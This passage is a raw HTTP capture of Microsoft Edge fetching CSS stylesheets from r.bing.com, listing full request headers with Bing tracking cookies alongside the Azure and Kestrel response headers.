bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 34
Content-Type: text/css
Content-Encoding: br
Content-MD5: vu36kkSQmqU4rgIojOI2Kg==
Last-Modified: Tue, 24 Sep 2024 06:47:29 GMT
ETag: 0x8DCDC64C2770C74
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 366508fb-c01e-006a-369c-16b63b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=361447
Expires: Wed, 09 Oct 2024 20:29:57 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a20a4
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Sup-zKprBXap74esHIEtHpeXnfE.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Sup-zKprBXap74esHIEtHpeXnfE.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 209
Content-Type: text/css
Content-Encoding: br
Content-MD5: DnFuRpje8XuxZ0GXQ+B5Uw==
Last-Modified: Tue, 24 Sep 2024 06:25:22 GMT
ETag: 0x8DCDC61AB82CBA9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 01c10a5b-601e-0001-0513-16eb6d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=302742
Expires: Wed, 09 Oct 2024 04:11:32 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a222d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rb/5W/cc,nc/o7B3FK6ymEOn7sBfZSmifVTwxPk.css?bu=AYcB&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/5W/cc,nc/o7B3FK6ymEOn7sBfZSmifVTwxPk.css?bu=AYcB&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 10
Content-Type: text/css; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Mon, 23 Sep 2024 23:58:55 GMT
X-EventID: 66fe485944e440a887ce65ee7e825b1b
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0001729D
X-AS-SuppressSetCookie: 1
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-2rUxvTR9V1O3C6m962Rt9O7xBAhRiAGt2znX9xw2dzA='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=228250
Expires: Tue, 08 Oct 2024 07:30:00 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a23ba
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/zNCol8wZNOqNu5J9AALR7kSilGc.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/zNCol8wZNOqNu5J9AALR7kSilGc.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1

Response

HTTP/1.1 200 OK

Last-Modified: Fri, 28 Jun 2024 02:11:44 GMT
ETag: 0x8DC9717A87B85C9
Akamai-GRN: 0.b2777b5c.1728031630.513f26d
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 41
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: T/hoBLqoViHGTblb5pL48w==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fa42c81c-c01e-008a-304e-0e5f1d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=75482
Expires: Sun, 06 Oct 2024 13:05:43 GMT
Date: Sat, 05 Oct 2024 16:07:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144461.f0a24ee
Timing-Allow-Origin: *
GET

https://r.bing.com/rb/5W/cc,nc/S82YEC3KdUeCBfNcc1WIZiHkL0c.css?bu=IYcBhwGTD7QRhwHfEdwSuRjtGPcYhwGHAa8a5Cf7KocB6DSgQYcBhwHBL60HsAeHAU_hAfQEhwGHAZ1Y0liHAYcB&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/5W/cc,nc/S82YEC3KdUeCBfNcc1WIZiHkL0c.css?bu=IYcBhwGTD7QRhwHfEdwSuRjtGPcYhwGHAa8a5Cf7KocB6DSgQYcBhwHBL60HsAeHAU_hAfQEhwGHAZ1Y0liHAYcB&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 6156
Content-Type: text/css; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Wed, 13 Oct 2010 11:37:36 GMT
X-EventID: 66fef8cb96bd4ff8b2399369c6fd7556
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E062
X-AS-SuppressSetCookie: 1
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-6T5ZpFnAhK3PVcf4tkS51RWrN3w/tmrK2ODtOHboFZU='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=273589
Expires: Tue, 08 Oct 2024 20:05:18 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097332
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/8hd1-XgnZ26SnhiiMN_GgejYN8w.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/8hd1-XgnZ26SnhiiMN_GgejYN8w.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 75
Content-Type: text/css
Content-Encoding: br
Content-MD5: 2luF31/cu57H/qpO9PIHtw==
Last-Modified: Tue, 24 Sep 2024 05:53:58 GMT
ETag: 0x8DCDC5D48950ED2
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5b1aeef9-c01e-0043-2542-16c079000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=322915
Expires: Wed, 09 Oct 2024 09:47:24 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097355
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/7APrwFbw1Ly9Oc0nCuyUM30nTqM.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/7APrwFbw1Ly9Oc0nCuyUM30nTqM.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 244
Content-Type: text/css
Content-Encoding: br
Content-MD5: U59d6xcASULZxenJXCkeFw==
Last-Modified: Tue, 24 Sep 2024 05:51:12 GMT
ETag: 0x8DCDC5CE5BDA9CE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ad01c633-e01e-001b-1346-16c402000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=324697
Expires: Wed, 09 Oct 2024 10:17:06 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0974cd
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rb/5U/cc,nc/x0UaV4rAXPOr7W3kHPDIjM0y2-0.css?bu=BG-2F7MXqRc&or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rb/5U/cc,nc/x0UaV4rAXPOr7W3kHPDIjM0y2-0.css?bu=BG-2F7MXqRc&or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
